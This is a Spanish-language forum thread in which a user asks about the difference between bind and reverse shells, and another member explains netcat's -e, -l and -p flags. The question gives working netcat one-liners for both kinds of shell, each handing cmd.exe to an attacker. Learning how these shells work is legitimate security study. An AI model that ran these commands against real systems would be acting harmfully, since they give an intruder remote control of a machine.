netcat, duda con el tipo de conexiones

Iniciado por retr02332, 16 Agosto 2020, 07:21 AM

0 Miembros y 1 Visitante están viendo este tema.

retr02332

Hola a todos.

Tengo una cierta duda con las bind y reverse shell.

(suponiendo kali como atacante y windows 7 como victima)

Conexion directa

windows 7: nc -lvvp 1234 -e cmd.exe
Kali: nc [IP-windows 7] 1234

Conexion reversa

Kali: nc -lvvp 1234
windows 7: nc [IP] 1234 -e cmd.exe

###################################################

Mis dudas son las siguientes:

pregunta 1.¿una conexion directa de windows a kali, es equivalente a una reversa siendo kali el puerto a la escucha?
Se que una conexion reversa es mejor a una directa por muchas cosas como evitar ser filtrado por el firewall, un cambio de ip inesperado por parte del NAT (o hasta del puerto, etc).

Teniendo eso claro, entonces... si windows se conecta a kali de forma directa, a la maquina windows 7...
pregunta 2. ¿tambien presentaria problemas al intentar conectarse conmigo por cosas como mi firewall y asi?

pregunta 3. ¿Asi que la diferencia entre ambos tipos de conexiones radica en quien tiene la bandera "-e shell"?.
¿Es esa entonces la diferencia entre ambos tipos de conexiones?, ¿sobre quien tiene el modificador "-e"?

Muchas gracias

WHK

#1
Hola, en tus primeras dos preguntas estás en lo correcto, pero no en la tercera. El flag "-e" siempre se ejecuta del lado del sistema que se desea controlar, independientemente que sea a traves de una conexión directa o inversa.

La diferencia radica en quien escucha y quen conecta y esa opción es "-l" (listen) y "-p" (puerto a escuchar).

Las dos "vv" es para verbose, lo puedes usar tanto en el cliente como en el servidor.

Saludos.